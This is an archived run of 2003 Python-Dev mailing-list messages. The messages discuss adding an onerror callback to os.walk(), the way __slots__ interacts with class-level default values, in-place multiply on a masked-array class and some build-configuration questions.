  File "<pyshell#6>", line 1, in ?
    A().x = 2
AttributeError: 'A' object attribute 'x' is read-only
>>> B().x = 2


From guido@python.org  Tue May 13 14:51:33 2003
From: guido@python.org (Guido van Rossum)
Date: Tue, 13 May 2003 09:51:33 -0400
Subject: [Python-Dev] os.walk() silently ignores errors
In-Reply-To: Your message of "Tue, 13 May 2003 10:52:43 BST."
 <E19FWSr-0000jb-00@straylight>
References: <E19FWSr-0000jb-00@straylight>
Message-ID: <200305131351.h4DDpXG30768@odiug.zope.com>

> I've just noticed that os.walk() silently skips unreadable
> directories.  I think this is surprising behaviour, which at least
> should be documented (there is a comment explaining this is source,
> but nothing in the doc string).  Is it too late to add an optional
> callback argument to handle unreadable directories, so the caller
> could log them, raise an exception or whatever?  I think the default
> behaviour should still be to silently ignore them, but it would be
> nice to have a way to override it.

Ignoring is definitely the right thing to do by default, as otherwise
the existence of a single unreadable directory would cause your entire
walk to fail.  What's your use case for wanting to do something else?

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@python.org  Tue May 13 14:57:46 2003
From: guido@python.org (Guido van Rossum)
Date: Tue, 13 May 2003 09:57:46 -0400
Subject: [Python-Dev] __slots__ and default values
In-Reply-To: Your message of "Tue, 13 May 2003 09:23:49 EDT."
 <000601c31954$728e9500$32b02c81@oemcomputer>
References: <000601c31954$728e9500$32b02c81@oemcomputer>
Message-ID: <200305131357.h4DDvkJ31195@odiug.zope.com>

> Was there a reason that __slots__ makes initialized
> variables read-only?  It would be useful to have
> overridable default values (even if it entailed copying
> them into an instance's slots):
> 
> class Pane(object):
>     __slots__ = ('background', 'foreground', 'size', 'content')
>     background = 'black'
>     foreground = 'white'
>     size = (80, 25)
> 
> p = Pane()
> p.background = 'light blue'     # override the default
> assert p.foreground == 'white' # other defaults still in-place

You can't do that.  The class variable 'background' overrides the
descriptor created by __slots__.  background now appears read-only
because there is no instance dict.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From jacobs@penguin.theopalgroup.com  Tue May 13 15:07:45 2003
From: jacobs@penguin.theopalgroup.com (Kevin Jacobs)
Date: Tue, 13 May 2003 10:07:45 -0400 (EDT)
Subject: [Python-Dev] __slots__ and default values
In-Reply-To: <000601c31954$728e9500$32b02c81@oemcomputer>
Message-ID: <Pine.LNX.4.44.0305130956030.12864-100000@penguin.theopalgroup.com>

On Tue, 13 May 2003, Raymond Hettinger wrote:
> Was there a reason that __slots__ makes initialized
> variables read-only?  It would be useful to have
> overridable default values (even if it entailed copying
> them into an instance's slots):
> 
> class Pane(object):
>     __slots__ = ('background', 'foreground', 'size', 'content')
>     background = 'black'
>     foreground = 'white'
>     size = (80, 25)
> 
> p = Pane()
> p.background = 'light blue'     # override the default
> assert p.foreground == 'white' # other defaults still in-place

Those attributes are read-only, because there is a name collision between
the slot descriptors for 'background' and 'foreground', so the class favors
the class variables.  Thus, no slots are allocated for 'background' and
'foreground', so the instance, not having an instance dictionary correctly
reports that those attributes are indeed read-only.

Also, slots are not automatically initialized from class variables, though
one can easily write a metaclass to do so.  (Actually, it is only easy for a
first approximation, it is actually quite tricky to get 100% correct.)

-Kevin

-- 
--
Kevin Jacobs
The OPAL Group - Enterprise Systems Architect
Voice: (216) 986-0710 x 19         E-mail: jacobs@theopalgroup.com
Fax:   (216) 986-0714              WWW:    http://www.theopalgroup.com



From aahz@pythoncraft.com  Tue May 13 15:17:19 2003
From: aahz@pythoncraft.com (Aahz)
Date: Tue, 13 May 2003 10:17:19 -0400
Subject: [Python-Dev] __slots__ and default values
In-Reply-To: <000601c31954$728e9500$32b02c81@oemcomputer>
References: <000601c31954$728e9500$32b02c81@oemcomputer>
Message-ID: <20030513141719.GA12321@panix.com>

On Tue, May 13, 2003, Raymond Hettinger wrote:
>
> Was there a reason that __slots__ makes initialized variables
> read-only?  It would be useful to have overridable default values
> (even if it entailed copying them into an instance's slots):
>
> class Pane(object):
>     __slots__ = ('background', 'foreground', 'size', 'content')
>     background = 'black'
>     foreground = 'white'
>     size = (80, 25)
> 
> p = Pane()
> p.background = 'light blue'     # override the default
> assert p.foreground == 'white' # other defaults still in-place

Why not do the initializing in __init__?
-- 
Aahz (aahz@pythoncraft.com)           <*>         http://www.pythoncraft.com/

"In many ways, it's a dull language, borrowing solid old concepts from
many other languages & styles:  boring syntax, unsurprising semantics,
few automatic coercions, etc etc.  But that's one of the things I like
about it."  --Tim Peters on Python, 16 Sep 93


From jeremy@zope.com  Tue May 13 15:40:39 2003
From: jeremy@zope.com (Jeremy Hylton)
Date: 13 May 2003 10:40:39 -0400
Subject: [Python-Dev] Need some patches checked
In-Reply-To: <200305120020.h4C0KIm29011@pcp02138704pcs.reston01.va.comcast.net>
References: <3EBEDDE0.3040308@ocf.berkeley.edu>
 <200305120020.h4C0KIm29011@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <1052836839.973.6.camel@slothrop.zope.com>

On Sun, 2003-05-11 at 20:20, Guido van Rossum wrote:
> > Since I am trying to tackle patches that were not written by me for the 
> > first time I need someone to check that I am doing the right thing.

There are a bunch of open bugs and patches for urllib2.  I've cleaned up
a few things lately.  We might make a concerted effort to close them all
for 2.3b2.  Whole-scale refactoring can be more effective that a large
set of small fixes.

Jeremy




From harri.pasanen@trema.com  Tue May 13 16:06:27 2003
From: harri.pasanen@trema.com (Harri Pasanen)
Date: Tue, 13 May 2003 17:06:27 +0200
Subject: [Python-Dev] os.walk() silently ignores errors
In-Reply-To: <200305131351.h4DDpXG30768@odiug.zope.com>
References: <E19FWSr-0000jb-00@straylight> <200305131351.h4DDpXG30768@odiug.zope.com>
Message-ID: <200305131706.27202.harri.pasanen@trema.com>

On Tuesday 13 May 2003 15:51, Guido van Rossum wrote:
> > I've just noticed that os.walk() silently skips unreadable
> > directories.  I think this is surprising behaviour, which at
> > least should be documented (there is a comment explaining this is
> > source, but nothing in the doc string).  Is it too late to add an
> > optional callback argument to handle unreadable directories, so
> > the caller could log them, raise an exception or whatever?  I
> > think the default behaviour should still be to silently ignore
> > them, but it would be nice to have a way to override it.
>
> Ignoring is definitely the right thing to do by default, as
> otherwise the existence of a single unreadable directory would
> cause your entire walk to fail.  What's your use case for wanting
> to do something else?

Sometimes I'm looking for something in a files in directory tree, 
forgetting I don't have access permissions to a particular 
subdirectory by default.  So the search can silently fail, and I'm 
left with the wrong idea that what I was looking is not there.

Ideally, I'd like the possibility have my script remind me to login as 
root prior to running it.
 
I know I could do some defensive programming in the walker function to 
go around this, but I this would likely imply more stat calls and 
impact performance. 

I've been bitten by this a couple of times, so I thought I'd pipe in.  

-Harri


From duncan@rcp.co.uk  Tue May 13 16:20:30 2003
From: duncan@rcp.co.uk (Duncan Booth)
Date: Tue, 13 May 2003 16:20:30 +0100
Subject: [Python-Dev] __slots__ and default values
References: <000601c31954$728e9500$32b02c81@oemcomputer> <20030513141719.GA12321@panix.com>
Message-ID: <Xns937AA5DBF878Aduncanrcpcouk@127.0.0.1>

Aahz <aahz@pythoncraft.com> wrote in news:20030513141719.GA12321@panix.com:

> On Tue, May 13, 2003, Raymond Hettinger wrote:
>>
>> Was there a reason that __slots__ makes initialized variables
>> read-only?  It would be useful to have overridable default values
>> (even if it entailed copying them into an instance's slots):
>>
>> class Pane(object):
>>     __slots__ = ('background', 'foreground', 'size', 'content')
>>     background = 'black'
>>     foreground = 'white'
>>     size = (80, 25)
>> 
>> p = Pane()
>> p.background = 'light blue'     # override the default
>> assert p.foreground == 'white' # other defaults still in-place
> 
> Why not do the initializing in __init__?

The following works, but I can't remember whether you're supposed to be 
able to use a dict in __slots__ or if it just happens to be allowed:

>>> class Pane(object):
	__slots__ = { 'background': 'black', 'foreground': 'white',
		      'size': (80, 25) }
	def __init__(self):
		for k, v in self.__slots__.iteritems():
			setattr(self, k, v)

			
>>> p = Pane()
>>> p.background = 'blue'
>>> p.background, p.foreground
('blue', 'white')
>>> 

-- 
Duncan Booth                                             duncan@rcp.co.uk
int month(char *p){return(124864/((p[0]+p[1]-p[2]&0x1f)+1)%12)["\5\x8\3"
"\6\7\xb\1\x9\xa\2\0\4"];} // Who said my code was obscure?


From mcherm@mcherm.com  Tue May 13 16:25:18 2003
From: mcherm@mcherm.com (Michael Chermside)
Date: Tue, 13 May 2003 08:25:18 -0700
Subject: [Python-Dev] Re: __slots__ and default values
Message-ID: <1052839518.3ec10e5e3f7c0@mcherm.com>

Raymond Hettinger wrote:
> class Pane(object):
>     __slots__ = ('background', 'foreground', 'size', 'content')
>     background = 'black'
>     foreground = 'white'
>     size = (80, 25)
...which doesn't work since the class variable overwrites the
__slots__ descriptor.


Aahz replies:
> Why not do the initializing in __init__?

I presume that Raymond's concern was not that there wouldn't be
a way to do initialization, but that this would become a new c.l.p
FAQ and point of confusion for newbies. Unfortunately, I fear
that it will. Already I am seeing that people are "discovering"
class variables as a sort of "initialized instance variable"
instead of using __init__ as they "ought" to. Of course, it's NOT
an initialized instance variable, but newbies stumble across it
and seem to prefer it to using __init__.

Combine this with the fact that newbies from staticly typed 
languages tend to think of __slots__ as "practically mandatory" 
(because it prevents the use of instance variables not pre-declared,
which they erroniously think is a good thing) rather than the 
special purpose performance hack that it REALLY is, and you have
a recipe for trouble.

I'm not quite sure how to present things so as to steer them
right, but there's definitely a potential pitfall here.

-- Michael Chermside



From aleax@aleax.it  Tue May 13 16:29:54 2003
From: aleax@aleax.it (Alex Martelli)
Date: Tue, 13 May 2003 17:29:54 +0200
Subject: [Python-Dev] os.walk() silently ignores errors
In-Reply-To: <200305131706.27202.harri.pasanen@trema.com>
References: <E19FWSr-0000jb-00@straylight> <200305131351.h4DDpXG30768@odiug.zope.com> <200305131706.27202.harri.pasanen@trema.com>
Message-ID: <200305131729.54759.aleax@aleax.it>

On Tuesday 13 May 2003 05:06 pm, Harri Pasanen wrote:
   ...
> > Ignoring is definitely the right thing to do by default, as
> > otherwise the existence of a single unreadable directory would
> > cause your entire walk to fail.  What's your use case for wanting
> > to do something else?
>
> Sometimes I'm looking for something in a files in directory tree,
> forgetting I don't have access permissions to a particular
> subdirectory by default.  So the search can silently fail, and I'm
> left with the wrong idea that what I was looking is not there.
>
> Ideally, I'd like the possibility have my script remind me to login as
> root prior to running it.

Seconded!  The default of ignoring errors is just fine, but it WOULD
be nice to optionally get a callback on errors so as to be able to
raise warnings or exceptions.  "Errors should never pass silently
unless explicitly silenced" would argue for stronger diagnostic
behavior, but compatibility surely constrain the default behavior --
BUT, an easy way to get non-silent behavior would be something
I'd end up using, roughly, in 50% of my tree-walking scripts.


Alex



From mrussell@verio.net  Tue May 13 16:40:07 2003
From: mrussell@verio.net (Mark Russell)
Date: Tue, 13 May 2003 16:40:07 +0100
Subject: [Python-Dev] os.walk() silently ignores errors
In-Reply-To: Your message of "Tue, 13 May 2003 09:59:01 EDT."
 <20030513135901.5867.87468.Mailman@mail.python.org>
Message-ID: <E19Fbst-0001bt-00@straylight>

>Ignoring is definitely the right thing to do by default, as otherwise
>the existence of a single unreadable directory would cause your entire
>walk to fail.  What's your use case for wanting to do something else?

I was using os.walk() to copy a directory tree with some modifications - I
assumed that as no exceptions had been raised the tree had been copied
successfully.  It was only when I diffed the original and copy trees that I
found some directories had been skipped because they were unreadable.
Had I not checked I would have silently lost data - not behaviour I expect
from a python script :-)

Mark




From guido@python.org  Tue May 13 16:40:53 2003
From: guido@python.org (Guido van Rossum)
Date: Tue, 13 May 2003 11:40:53 -0400
Subject: [Python-Dev] os.path.walk() lacks 'depth first' option
In-Reply-To: Your message of "Mon, 12 May 2003 23:02:24 EDT."
 <5.1.0.14.0.20030512224621.03ef8500@mail.telecommunity.com>
References: <"Your message of Mon, 12 May 2003 20:34:21 EDT." <5.1.1.6.0.20030512202835.03078bb0@telecommunity.com> <5.1.1.6.0.20030512202835.03078bb0@telecommunity.com>
 <5.1.0.14.0.20030512224621.03ef8500@mail.telecommunity.com>
Message-ID: <200305131540.h4DFerS05699@odiug.zope.com>

How about this patch?

Index: os.py
===================================================================
RCS file: /cvsroot/python/python/dist/src/Lib/os.py,v
retrieving revision 1.70
diff -c -c -r1.70 os.py
*** os.py	25 Apr 2003 07:11:48 -0000	1.70
--- os.py	13 May 2003 15:40:21 -0000
***************
*** 203,209 ****
  
  __all__.extend(["makedirs", "removedirs", "renames"])
  
! def walk(top, topdown=True):
      """Directory tree generator.
  
      For each directory in the directory tree rooted at top (including top
--- 203,209 ----
  
  __all__.extend(["makedirs", "removedirs", "renames"])
  
! def walk(top, topdown=True, onerror=None):
      """Directory tree generator.
  
      For each directory in the directory tree rooted at top (including top
***************
*** 232,237 ****
--- 232,243 ----
      dirnames have already been generated by the time dirnames itself is
      generated.
  
+     By default errors from the os.listdir() call are ignored.  If
+     optional arg 'onerror' is specified, it should be a function;
+     it will be called with one argument, an exception instance.  It
+     can report the error to continue with the walk, or raise the
+     exception to abort the walk.
+ 
      Caution:  if you pass a relative pathname for top, don't change the
      current working directory between resumptions of walk.  walk never
      changes the current directory, and assumes that the client doesn't
***************
*** 259,265 ****
          # Note that listdir and error are globals in this module due
          # to earlier import-*.
          names = listdir(top)
!     except error:
          return
  
      dirs, nondirs = [], []
--- 265,273 ----
          # Note that listdir and error are globals in this module due
          # to earlier import-*.
          names = listdir(top)
!     except error, err:
!         if onerror is not None:
!             onerror(err)
          return
  
      dirs, nondirs = [], []
***************
*** 274,280 ****
      for name in dirs:
          path = join(top, name)
          if not islink(path):
!             for x in walk(path, topdown):
                  yield x
      if not topdown:
          yield top, dirs, nondirs
--- 282,288 ----
      for name in dirs:
          path = join(top, name)
          if not islink(path):
!             for x in walk(path, topdown, onerror):
                  yield x
      if not topdown:
          yield top, dirs, nondirs

--Guido van Rossum (home page: http://www.python.org/~guido/)


From theller@python.net  Tue May 13 16:45:34 2003
From: theller@python.net (Thomas Heller)
Date: 13 May 2003 17:45:34 +0200
Subject: [Python-Dev] Re: __slots__ and default values
In-Reply-To: <1052839518.3ec10e5e3f7c0@mcherm.com>
References: <1052839518.3ec10e5e3f7c0@mcherm.com>
Message-ID: <y91au9y9.fsf@python.net>

Michael Chermside <mcherm@mcherm.com> writes:

> Combine this with the fact that newbies from staticly typed 
> languages tend to think of __slots__ as "practically mandatory" 
> (because it prevents the use of instance variables not pre-declared,
> which they erroniously think is a good thing) rather than the 
> special purpose performance hack that it REALLY is, and you have
> a recipe for trouble.

Unrelated to *this* topic, but Andrew's "What's new in Python 2.2" still
presents __slots__ as a way to constrain the instance variables:

  A new-style class can define a class attribute named __slots__ to
  constrain the list of legal attribute names.

http://www.python.org/doc/current/whatsnew/sect-rellinks.html#SECTION000340000000000000000

This should probably be fixed.

Thomas



From walter@livinglogic.de  Tue May 13 17:14:51 2003
From: walter@livinglogic.de (=?ISO-8859-15?Q?Walter_D=F6rwald?=)
Date: Tue, 13 May 2003 18:14:51 +0200
Subject: [Python-Dev] os.path.walk() lacks 'depth first' option
In-Reply-To: <200305131540.h4DFerS05699@odiug.zope.com>
References: <"Your message of Mon, 12 May 2003 20:34:21 EDT." <5.1.1.6.0.20030512202835.03078bb0@telecommunity.com> <5.1.1.6.0.20030512202835.03078bb0@telecommunity.com>              <5.1.0.14.0.20030512224621.03ef8500@mail.telecommunity.com> <200305131540.h4DFerS05699@odiug.zope.com>
Message-ID: <3EC119FB.5000302@livinglogic.de>

Guido van Rossum wrote:

> How about this patch?

I like the increased flexibility. But how about the following
version?

---
def walk(top, order=".d", recursive=True, onerror=None):
    from os.path import join, isdir, islink, normpath
    try:
       names = listdir(top)
    except error, err:
       if onerror is not None:
          onerror(err)
       return

    dirs, nondirs = [], []
    for name in names:
       if isdir(join(top, name)):
          dirs.append(name)
       else:
          nondirs.append(name)

    for c in order:
       if c==".":
          yield top, dirs, nondirs
       elif c=="f":
          for nd in nondirs:
             yield normpath(join(top, nd)), [], []
       elif c=="d":
          for name in dirs:
             path = join(top, name)
             if not islink(path):
                if recursive:
                   for x in walk(path, order, recursive, onerror):
                      yield (normpath(x[0]), x[1], x[2])
                else:
                   yield path
       else:
          raise ValueError, "unknown order %r" % c
---
It combines recursive and non-recursive walks, topdown and bottomup
walks, walks with and without files or directories.

E.g. Getting a list of all files, topdown:
    [x[0] for x in os.walk(top, order="fd")]
or a list of directories bottom up:
    [x[0] for x in os.walk(top, order="d.")]
or a list of files and directories, topdown, with
files before subdirectories:
    [x[0] for x in os.walk(top, order=".fd")]

Bye,
    Walter Dörwald




From walter@livinglogic.de  Tue May 13 17:36:18 2003
From: walter@livinglogic.de (=?ISO-8859-15?Q?Walter_D=F6rwald?=)
Date: Tue, 13 May 2003 18:36:18 +0200
Subject: [Python-Dev] os.path.walk() lacks 'depth first' option
In-Reply-To: <200305131620.h4DGKMi08267@odiug.zope.com>
References: <"Your message of Mon, 12 May 2003 20:34:21 EDT." <5.1.1.6.0.20030512202835.03078bb0@telecommunity.com> <5.1.1.6.0.20030512202835.03078bb0@telecommunity.com> <5.1.0.14.0.20030512224621.03ef8500@mail.telecommunity.com> <200305131540.h4DFerS05699@odiug.zope.com>              <3EC119FB.5000302@livinglogic.de> <200305131620.h4DGKMi08267@odiug.zope.com>
Message-ID: <3EC11F02.2060301@livinglogic.de>

Guido van Rossum wrote:

 >> I like the increased flexibility. But how about the following
 >> version?
 >
 >
 > I don't think there's any need for such increased flexibility.  Let's
 > stop while we're ahead.  Fixing the silent errors case is important
 > (see various posts here).  Your generalization is a YAGNI though.

True, getting a list of files in the current directory even works
with the current os.walk:

sum([[os.path.join(x[0], f) for f in x[2]] for x in os.walk(".")], [])

Bye,
    Walter Dörwald





From tim@zope.com  Tue May 13 18:19:48 2003
From: tim@zope.com (Tim Peters)
Date: Tue, 13 May 2003 13:19:48 -0400
Subject: [Python-Dev] os.path.walk() lacks 'depth first' option
In-Reply-To: <3EC11F02.2060301@livinglogic.de>
Message-ID: <BIEJKCLHCIOIHAGOKOLHOELKFKAA.tim@zope.com>

[Walter D=F6rwald]
> True, getting a list of files in the current directory even works
> with the current os.walk:
>
> sum([[os.path.join(x[0], f) for f in x[2]] for x in os.walk(".")], [])

Convoluted one-liners are poor Python style, IMO.  That walks the entire
tree, too.  If you want the files in just the current directory,

    for root, dirs, files in os.walk('.'):
        break
    print files

or if clarity is disturbing <wink>:

    files =3D os.walk('.').next()[-1]



From paul@pfdubois.com  Tue May 13 18:25:38 2003
From: paul@pfdubois.com (Paul Dubois)
Date: Tue, 13 May 2003 10:25:38 -0700
Subject: [Python-Dev] Inplace multiply
Message-ID: <000401c31974$ac31c730$6801a8c0@NICKLEBY>

My "masked array" class MA has a problem that I don't know how to solve. The
inplace multiply function

    def __imul__ (self, other)

is not getting called while my other input operations do work. The scenario
is

x = MA.array(...)

x *= c

If c is an int, this works correctly, calling MA.__imul__. Otherwise, I get
a message from the Python runtime saying it can't multiply a sequence by a
non-int. But change MA to Numeric, it works.

Numeric is an extension type and MA is a (new style) class. MA defines
__len__ as well as all the math operators.



From guido@python.org  Tue May 13 18:44:37 2003
From: guido@python.org (Guido van Rossum)
Date: Tue, 13 May 2003 13:44:37 -0400
Subject: [Python-Dev] Inplace multiply
In-Reply-To: Your message of "Tue, 13 May 2003 10:25:38 PDT."
 <000401c31974$ac31c730$6801a8c0@NICKLEBY>
References: <000401c31974$ac31c730$6801a8c0@NICKLEBY>
Message-ID: <200305131744.h4DHibn13549@odiug.zope.com>

> My "masked array" class MA has a problem that I don't know how to solve. The
> inplace multiply function
> 
>     def __imul__ (self, other)
> 
> is not getting called while my other input operations do work. The scenario
> is
> 
> x = MA.array(...)
> 
> x *= c
> 
> If c is an int, this works correctly, calling MA.__imul__. Otherwise, I get
> a message from the Python runtime saying it can't multiply a sequence by a
> non-int. But change MA to Numeric, it works.
> 
> Numeric is an extension type and MA is a (new style) class. MA defines
> __len__ as well as all the math operators.

We won't be able to help without seeing your code.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From jepler@unpythonic.net  Tue May 13 19:31:45 2003
From: jepler@unpythonic.net (Jeff Epler)
Date: Tue, 13 May 2003 13:31:45 -0500
Subject: [Python-Dev] Inplace multiply
In-Reply-To: <000401c31974$ac31c730$6801a8c0@NICKLEBY>
References: <000401c31974$ac31c730$6801a8c0@NICKLEBY>
Message-ID: <20030513183144.GH11289@unpythonic.net>

There must be something more to your problem than what you described.

The following executes just fine for me (ditto if NewKoke is a subclass
of object instead of list, and no matter whether I define __getitem__ or
not [a guess based on your remark about 'multiply a sequence']):

$ python dubois.py
sausages vegetable-style breakfast patty
sausages vegetable-style breakfast patty

class Klassic:
    def __imul__(self, other):
        return "sausages"
    def __getitem__(self, i): return None

class NewKoke(list):
    def __imul__(self, other):
        return "vegetable-style breakfast patty"
    def __getitem__(self, i): return None

k = Klassic()
o = NewKoke()

k *= 1
o *= 1

print k, o

k = Klassic()
o = NewKoke()

k *= "spam"
o *= "spam"

print k, o


From tim.one@comcast.net  Tue May 13 20:03:58 2003
From: tim.one@comcast.net (Tim Peters)
Date: Tue, 13 May 2003 15:03:58 -0400
Subject: [Python-Dev] os.path.walk() lacks 'depth first' option
In-Reply-To: <E19FSPn-0003kn-00@tswings.swing.cluster>
Message-ID: <BIEJKCLHCIOIHAGOKOLHKEMGFKAA.tim.one@comcast.net>

[Christian Tanzer]
> More hmmm...
>
> Just grepped over my source tree (1293 .py files, ~ 300000 lines):
>
> - 45 occurrences of `except AttributeError` with no mention of
>   `TypeError`
>
> - 16 occurrences of `except TypeError` with no mention of
>   `AttributeError`
>
> - 3 occurrences of `except (AttributeError, TypeError)`
>
> Works well enough for me.

With a fixed release of Python, it would be hard not to work well enough.  I
have to point out, though, that *across* Python releases, a frequent kind of
patch made to the Python test suite is changing former TypeError occurrences
to AttributeError, or vice versa.  I'm not sure which direction is most
common overall, and it's often unclear which is more appropriate.  For
example,

>>> d = {}
>>> d.update('abc')
Traceback (most recent call last):
  File "<stdin>", line 1, in ?
AttributeError: keys
>>>

I wouldn't be surprised if that changed to TypeError someday.

> Deriving both AttributeError and TypeError from a common base would
> make sense to me. Merging them wouldn't.

Yes -- and we should derive all exceptions from LookupError <wink>.



From tjreedy@udel.edu  Tue May 13 20:12:50 2003
From: tjreedy@udel.edu (Terry Reedy)
Date: Tue, 13 May 2003 15:12:50 -0400
Subject: [Python-Dev] Re: Inplace multiply
References: <000401c31974$ac31c730$6801a8c0@NICKLEBY> <20030513183144.GH11289@unpythonic.net>
Message-ID: <b9rg0i$9tm$1@main.gmane.org>

"Jeff Epler" <jepler@unpythonic.net> wrote in message
news:20030513183144.GH11289@unpythonic.net...
> There must be something more to your problem than what you
described.
>
> The following executes just fine for me (ditto if NewKoke is a
subclass
> of object instead of list, and no matter whether I define
__getitem__ or
> not [a guess based on your remark about 'multiply a sequence']):
>
> $ python dubois.py
> sausages vegetable-style breakfast patty
> sausages vegetable-style breakfast patty

On Win98 2.2.1, cut and paste into interactive window outputs
sausages vegetable-style breakfast patty
sausages []

> class Klassic:
>     def __imul__(self, other):
>         return "sausages"
>     def __getitem__(self, i): return None
>
> class NewKoke(list):
>     def __imul__(self, other):
>         return "vegetable-style breakfast patty"
>     def __getitem__(self, i): return None
>
> k = Klassic()
> o = NewKoke()
>
> k *= 1
> o *= 1
>
> print k, o
>
> k = Klassic()
> o = NewKoke()
>
> k *= "spam"
> o *= "spam"

Because line above gives
TypeError: can't multiply sequence to non-int

> print k, o

Maybe something has been 'fixed' since then.

Terry J. Reedy





From drifty@alum.berkeley.edu  Tue May 13 20:44:48 2003
From: drifty@alum.berkeley.edu (Brett C.)
Date: Tue, 13 May 2003 12:44:48 -0700
Subject: [Python-Dev] Need some patches checked
In-Reply-To: <1052836839.973.6.camel@slothrop.zope.com>
References: <3EBEDDE0.3040308@ocf.berkeley.edu>	 <200305120020.h4C0KIm29011@pcp02138704pcs.reston01.va.comcast.net> <1052836839.973.6.camel@slothrop.zope.com>
Message-ID: <3EC14B30.1000102@ocf.berkeley.edu>

Jeremy Hylton wrote:

> There are a bunch of open bugs and patches for urllib2.  I've cleaned up
> a few things lately.  We might make a concerted effort to close them all
> for 2.3b2.  Whole-scale refactoring can be more effective that a large
> set of small fixes.
> 

Aw, but Jeremey, I wanted to start working on the AST branch after I 
finished going through the open bugs and patches one time!  =)

We can and I am willing to help, but I suspect it would be best to first 
get the test suite rewritten; it is severely lacking.

Which reminds me, I need to finish writing urllib's tests by doing the 
network-requiring ones.

-Brett



From marc@informatik.uni-bremen.de  Tue May 13 20:58:45 2003
From: marc@informatik.uni-bremen.de (Marc Recht)
Date: Tue, 13 May 2003 21:58:45 +0200
Subject: [Python-Dev] Python 2.3b1 _XOPEN_SOURCE value from configure.in
In-Reply-To: <m3issfg9mh.fsf@mira.informatik.hu-berlin.de>
References: <200305121813.36383.harri.pasanen@trema.com>
 <m3issfg9mh.fsf@mira.informatik.hu-berlin.de>
Message-ID: <8560000.1052855925@leeloo.intern.geht.de>

--==========1813079384==========
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline

> Of course, it would be sufficient to set it to a smaller value on
> systems that support only older X/Open issues; I think I'd accept a
> patch that changes this (if the patch is correct, of course).
Defining __EXTENSIONS__ could also help. IIRC it works just like=20
_GNU_SOURCE/_NETBSD_SOURCE.

Regards,
Marc

mundus es fabula
--==========1813079384==========
Content-Type: application/pgp-signature
Content-Transfer-Encoding: 7bit

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.2 (NetBSD)

iD8DBQE+wU587YQCetAaG3MRAvh6AKCHCQAHyBXrVMdkZYMydWU/tXF3agCeK/iC
3zysIKN2VG/b80Yc5D6/3eI=
=tdrF
-----END PGP SIGNATURE-----

--==========1813079384==========--



From mrussell@verio.net  Tue May 13 21:08:25 2003
From: mrussell@verio.net (Mark Russell)
Date: Tue, 13 May 2003 21:08:25 +0100
Subject: [Python-Dev] os.path.walk() lacks 'depth first' option
In-Reply-To: Your message of "Tue, 13 May 2003 12:00:08 EDT."
 <20030513160008.1261.22301.Mailman@mail.python.org>
Message-ID: <E19Fg4X-0002AL-00@straylight>

>How about this patch?

Thanks - I tried that with my script and it worked nicely.  Hopefully this is
as complex as os.walk() needs to get.

Mark




From jepler@unpythonic.net  Tue May 13 21:15:50 2003
From: jepler@unpythonic.net (Jeff Epler)
Date: Tue, 13 May 2003 15:15:50 -0500
Subject: [Python-Dev] Re: Inplace multiply
In-Reply-To: <b9rg0i$9tm$1@main.gmane.org>
References: <000401c31974$ac31c730$6801a8c0@NICKLEBY> <20030513183144.GH11289@unpythonic.net> <b9rg0i$9tm$1@main.gmane.org>
Message-ID: <20030513201549.GJ11289@unpythonic.net>

On Tue, May 13, 2003 at 03:12:50PM -0400, Terry Reedy wrote:
> On Win98 2.2.1, cut and paste into interactive window outputs
> TypeError: can't multiply sequence to non-int
> 
> > print k, o
> 
> Maybe something has been 'fixed' since then.

using RedHat9's "2.2.2-26" here.

Jeff


From martin@v.loewis.de  Tue May 13 21:57:22 2003
From: martin@v.loewis.de (Martin v. =?iso-8859-15?q?L=F6wis?=)
Date: 13 May 2003 22:57:22 +0200
Subject: [Python-Dev] Python 2.3b1 _XOPEN_SOURCE value from configure.in
In-Reply-To: <8560000.1052855925@leeloo.intern.geht.de>
References: <200305121813.36383.harri.pasanen@trema.com>
 <m3issfg9mh.fsf@mira.informatik.hu-berlin.de>
 <8560000.1052855925@leeloo.intern.geht.de>
Message-ID: <m365oe1s5p.fsf@mira.informatik.hu-berlin.de>

Marc Recht <marc@informatik.uni-bremen.de> writes:

> Defining __EXTENSIONS__ could also help. IIRC it works just like
> _GNU_SOURCE/_NETBSD_SOURCE.

We do define __EXTENSIONS__, this is not the issue. We define
_XOPEN_SOURCE to 600 on all systems, because that is the highest value
specified by any X/Open spec today. The system may not support all of
the latest Posix features; this is not problem because we
autoconfiscate them.

The problem really only occurs if somebody thinks they need to define
_XOPEN_SOURCE to some other value; the compiler will then complain.

Regards,
Martin



From tdelaney@avaya.com  Tue May 13 22:32:49 2003
From: tdelaney@avaya.com (Delaney, Timothy C (Timothy))
Date: Wed, 14 May 2003 07:32:49 +1000
Subject: [Python-Dev] __slots__ and default values
Message-ID: <338366A6D2E2CA4C9DAEAE652E12A1DE57F30C@au3010avexu1.global.avaya.com>

> From: Raymond Hettinger [mailto:raymond.hettinger@verizon.net]
>=20
> class Pane(object):
>     __slots__ =3D ('background', 'foreground', 'size', 'content')
>     background =3D 'black'
>     foreground =3D 'white'
>     size =3D (80, 25)
>=20
> p =3D Pane()
> p.background =3D 'light blue'     # override the default
> assert p.foreground =3D=3D 'white' # other defaults still in-place

Wow - I hadn't realised that.

I would prefer to think of this is a useful feature rather than a wart. =
Finally we can have true constants!

class Pane (module): # Or whatever - you get the idea ;)

    __slots__ =3D ('background', 'foreground', 'size', 'content', =
'__name__', '__file__')
    __name__ =3D globals()['__name__']
    __file__ =3D globals()['__file__']

    background =3D 'black'
    foreground =3D 'white'
    size =3D (80, 25)

import sys
sys.modules[__name__] =3D Pane()

OK - so you could get around it by getting the class of the "module" and =
then modifying that ... but it's the best yet. It even tells you that =
the attribute is read-only!

Tim Delaney


From guido@python.org  Tue May 13 22:38:10 2003
From: guido@python.org (Guido van Rossum)
Date: Tue, 13 May 2003 17:38:10 -0400
Subject: [Python-Dev] __slots__ and default values
In-Reply-To: Your message of "Wed, 14 May 2003 07:32:49 +1000."
 <338366A6D2E2CA4C9DAEAE652E12A1DE57F30C@au3010avexu1.global.avaya.com>
References: <338366A6D2E2CA4C9DAEAE652E12A1DE57F30C@au3010avexu1.global.avaya.com>
Message-ID: <200305132138.h4DLcA930451@odiug.zope.com>

> I would prefer to think of this is a useful feature rather than a
> wart. Finally we can have true constants!

Yuck.  If you want that, define a property-like class that doesn't
allow setting.

